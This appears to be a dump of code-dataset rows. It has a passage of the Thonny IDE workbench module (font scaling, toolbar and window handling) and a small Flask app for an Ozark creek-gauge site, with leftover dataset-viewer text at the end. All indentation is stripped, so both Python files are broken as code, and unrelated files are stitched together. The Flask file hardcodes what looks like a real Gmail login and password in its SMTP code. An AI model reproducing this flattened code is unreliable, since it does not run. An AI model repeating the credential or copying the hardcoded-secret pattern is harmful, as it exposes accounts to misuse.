# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# previously selected widget would be better candidate, but this is
# better than button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if (
self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS
) and view_name in self._view_records:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
ocg.py
|
#--------------------------------------------------------
#File Name: ocg.py
#Purpose: App router for the Ozark Creek Gauges Web App
#Author: Capstone Group 1
#Date: January 31, 2021
#Includes Templates from templated.co
#--------------------------------------------------------
from flask import Flask, request, render_template, session, redirect
import random
from scraper import scrape
import time
import threading
import smtplib
from email.message import EmailMessage
app = Flask(__name__,static_folder='static', static_url_path='/static')
#Global Variables for HTML placeholders
names = []
times = []
values = []
loading = ""
#Adjust necessary globals once the scraper thread is finished
def background():
items = scrape()
global names
names = items[0]
global times
times = items[1]
global values
values = items[2]
global loading
loading = 'none'
#Takes form data as a Dictionary and appends it to file
def writeToFile(form):
message = "Type: " + form['type'] + "\n " + "User Name: "+ form['name'] + "\n" + "Contact Info: " +form['contactinfo'] + "\n" + "River Name: "+ form['rivername'] + "\n" + "Gauge: "+ form['gauge2'] + "\n" + "Location: "+ form['location2'] + "\n" + "Message: "+ form['message'] + "\n"
msg = EmailMessage()
msg.set_content(message)
msg['Subject'] = form['rivername'] + " addition"
msg['From'] = "ozarkcreekgauges@gmail.com"
msg['To'] = "ozarkcreekgauges@gmail.com"
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login("ozarkcreekgauges", "WeLoveBoats1!")
s.send_message(msg)
s.quit()
#Main/Table page
@app.route('/',methods=["GET"])
@app.route('/index.html',methods=["GET"])
def index():
t1 = threading.Thread(target=background)
t1.start()
return render_template('index.html',names = names, times = times, values = values, loading=loading)
#River Map
@app.route('/map.html',methods=["POST","GET"])
def map():
return render_template('map.html')
#About Page with Changes Submission
@app.route('/about.html',methods=["POST","GET"])
def about():
return render_template('about.html')
#For submitting changes
@app.route('/submit',methods=["POST","GET"])
def submit():
writeToFile(request.form)
return redirect("/about.html")
if __name__ == "__main__":
app.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.